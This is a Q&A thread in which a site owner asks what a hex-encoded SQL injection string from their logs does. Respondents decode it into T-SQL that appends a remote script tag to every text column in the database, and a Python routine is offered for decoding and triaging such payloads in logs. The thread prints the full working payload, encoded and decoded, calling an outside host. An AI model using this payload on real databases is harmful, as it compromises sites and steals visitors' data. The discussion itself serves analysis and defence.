Possible Duplicate:
Attempted SQL injection attack - what are they trying to do?
I have seen this SQL injection attempt on my site many times in the last few months.
';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself. However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.
Can anyone explain to me what these hackers are attempting to do with this code?
Thanks.
This code is getting appended to the query string as well as getting sent as POST data.
Note: my first explanation was incorrect because I didn't actually read through the whole thing...
Here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99, 35, 231, 167) and then injects a JavaScript file into all text columns in your database. A bit more malicious than I first thought.
DECLARE
@T varchar(255),
@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT
FROM Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
</title>
<script src="http://www2.s800qn.cn/csrss/w.js"></script>
<!--''+['+@C+'] where '+@C+' not like ''%">
</title>
<script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
'')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Actually, Jimmy, if you analyze this code, it uses a cursor to inject a JavaScript reference to hxxp://www2.s800qn.cn/csrss/w.js into every text field in the database.
This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.
That JavaScript link is now dead, but it probably contained code to grab the users' cookies.
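Both answers above explain what the payload does once decoded; what a defender reviewing web logs actually sees is the hex-encoded wrapper from the question. The following is an added example (not code from either answer): a small Python triage routine that pulls the hex literal out of `CAST(0x... AS CHAR(4000))`, decodes it, checks for the indicators this family of payloads shares (sysobjects/syscolumns enumeration, a cursor, a dynamic UPDATE carrying a `<script>` tag), and lists the script URLs it would write into the database. The sample parameter value is constructed in the same shape as the question's payload but shortened, with a hypothetical URL.

```python
import binascii
import re

# The wrapper seen in the question hides the real T-SQL as a hex literal inside
# CAST(0x... AS CHAR(4000)) and then runs it with EXEC(@S). This regex pulls the hex out.
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)", re.IGNORECASE
)

# Fragments that, together, characterise this mass-injection family: schema enumeration
# through sysobjects/syscolumns, a cursor, and a dynamic UPDATE appending a <script> tag.
INDICATORS = ("sysobjects", "syscolumns", "cursor", "exec(", "update", "<script")

def decode_hex_casts(param_value):
    """Decode every CAST(0x.. AS CHAR) literal found in one request parameter value."""
    out = []
    for hexstr in HEX_CAST_RE.findall(param_value):
        if len(hexstr) % 2:            # odd length: not a valid byte string, skip it
            continue
        out.append(binascii.unhexlify(hexstr).decode("latin-1"))
    return out

def script_sources(sql_text):
    """List the external script URLs the decoded payload would write into the database."""
    return re.findall(r'<script\s+src="([^"]+)"', sql_text, re.IGNORECASE)

def triage(param_value):
    """Summarise one parameter value: decoded payload count, indicators hit, script URLs."""
    decoded = decode_hex_casts(param_value)
    hits, urls = set(), []
    for text in decoded:
        low = text.lower()
        hits.update(k for k in INDICATORS if k in low)
        urls.extend(script_sources(text))
    return {"payloads": len(decoded), "indicators": sorted(hits),
            "script_sources": urls, "suspicious": len(hits) >= 3}

# Constructed sample (hypothetical URL) in the same shape as the question's payload,
# shortened so the decoded text stays readable; it is not the original hex blob.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
    "exec('update ['+@T+'] set ['+@C+']=''<script src=\"http://example.invalid/w.js\">"
    "</script>''+['+@C+']') CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_PARAM = ("';DECLARE @S CHAR(4000);SET @S=CAST(0x" + INNER_SQL.encode("latin-1").hex().upper()
                + " AS CHAR(4000));EXEC(@S);")

if __name__ == "__main__":
    print(triage(SAMPLE_PARAM))
    print(decode_hex_casts(SAMPLE_PARAM)[0])
```

Run `triage()` over each query-string and POST parameter value in your access logs; the `script_sources` list is also the string to search your own text columns for if you suspect the injection ever succeeded.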